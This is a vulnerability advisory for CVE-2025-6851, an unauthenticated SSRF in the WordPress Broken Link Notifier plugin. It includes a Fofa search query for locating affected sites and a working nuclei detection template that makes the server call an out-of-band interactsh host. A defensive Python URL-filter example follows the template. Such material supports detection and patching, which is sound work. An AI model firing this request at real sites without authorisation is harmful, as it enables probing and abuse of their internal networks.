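WordPress Broken Link Notifier Server-Side Request Forgery Vulnerability

Vulnerability Information

Vulnerability name: WordPress Broken Link Notifier Server-Side Request Forgery Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-6851

Vulnerability type: Server-Side Request Forgery

Severity: High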

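Description: The Broken Link Notifier plugin for WordPress contains a server-side request forgery (SSRF) vulnerability in all versions up to and including 1.3.0. The flaw originates in the check_url_status_code() function, which is ultimately called by ajax_blinks(), and allows unauthenticated attackers to make web requests to arbitrary locations originating from the web application. This can be used to query and modify information from internal services. The affected plugin is used on WordPress sites to help administrators detect and be notified of broken links, and is a common site-maintenance tool. The technical root cause is insufficient validation and filtering of user-supplied URL input, which lets an attacker craft malicious requests that bypass security restrictions and access or manipulate internal network resources. The impact is high: an attacker can use the flaw for internal service discovery, data disclosure, or further attacks. Because exploitation requires no authentication and can be automated, it poses a serious threat to every WordPress site running an affected version of the plugin. Users are advised to update the plugin to version 1.3.1 or later immediately to fix this vulnerability.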

Vendor: broken_link_notifier_project

Product: Broken Link Notifier

Affected versions: version <= 1.3.0

Search query: body="blnotifier_front_end"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/619507861c407516e9bdac3c1b4cd9c1ce7e96ce/http%2Fcves%2F2025%2FCVE-2025-6851.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details


id: CVE-2025-6851

info:
  name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
  impact: |
    An attacker can exploit this vulnerability to perform server-side request forgery attacks, potentially accessing internal services, reading local files, or conducting port scanning from the server's perspective.
  remediation: |
    Update the Broken Link Notifier plugin to version 1.3.1 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6851
    - https://wpscan.com/vulnerability/CVE-2025-6851
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-notifier/broken-link-notifier-130-unauthenticated-server-side-request-forgery
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-6851
    cwe-id: CWE-918
    epss-score: 0.00043
    epss-percentile: 0.09677
    cpe: cpe:2.3:a:broken_link_notifier_project:broken_link_notifier:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broken_link_notifier_project
    product: broken_link_notifier
    publicwww-query: "/wp-content/plugins/broken-link-notifier/"
    fofa-query: body="blnotifier_front_end"
  tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'blnotifier_front_end')
        internal: true

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'blnotifier_front_end.*"nonce":"(.*?)"'

  - raw:
      - |-
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        action=blnotifier_blinks&nonce={{nonce}}&source_url=http://test&header_links[]=http://{{interactsh-url}}&

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'notify', 'timing', 'Results were generated in')
          - status_code == 200
        condition: and
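
The description above attributes the flaw to missing validation of user-supplied URLs. The following Python is an added example, not the plugin's code or its 1.3.1 fix: it inspects the `source_url` and `header_links[]` fields of a `blnotifier_blinks` request body and refuses any URL whose host is, or resolves to, a non-public address. The function names, the sample body and the resolver stub are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import parse_qsl, urlsplit

ACTION = "blnotifier_blinks"                   # AJAX action named in the template
URL_PARAMS = {"source_url", "header_links[]"}  # URL-bearing fields of that request

def system_resolve(host):
    """OS resolver; it also decodes host forms such as the decimal 2130706433."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})
    except (socket.gaierror, ValueError):
        return []

def blocked_reason(url, resolve=system_resolve):
    """Return why a server-side fetch of url is refused, or None if allowed."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "malformed URL"
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "not an http(s) URL with a host"
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]
    except ValueError:  # a name, not an IP literal: check every address it maps to
        addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    if not addrs:
        return "host does not resolve"
    for ip in addrs:
        ip = getattr(ip, "ipv4_mapped", None) or ip  # unwrap ::ffff:a.b.c.d
        if not ip.is_global:  # loopback, RFC 1918, link-local, reserved, ...
            return f"non-public address {ip}"
    return None

def inspect_ajax_body(body, resolve=system_resolve):
    """Return (param, url, reason) for each refused URL in a blnotifier_blinks body."""
    pairs = parse_qsl(body, keep_blank_values=True)
    if ("action", ACTION) not in pairs:
        return []
    checked = [(n, v, blocked_reason(v, resolve)) for n, v in pairs if n in URL_PARAMS]
    return [hit for hit in checked if hit[2]]

# Constructed sample data (not captured traffic): resolver stub and a POST body.
SAMPLE_DNS = {"blog.example": ["93.184.216.34"], "intranet.example": ["10.0.0.5"]}
SAMPLE_BODY = ("action=blnotifier_blinks&nonce=abc123&source_url=http://blog.example/post"
               "&header_links[]=http://intranet.example/&header_links[]=http://127.0.0.1:8080/")
if __name__ == "__main__":
    for hit in inspect_ajax_body(SAMPLE_BODY, lambda h: SAMPLE_DNS.get(h, [])):
        print(hit)
```

A fetcher that relies on this check must connect to the address it validated and re-validate every redirect target; otherwise a second DNS answer or a redirect can still steer the request to an internal host.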



Author: lianccc
Published: July 16, 2025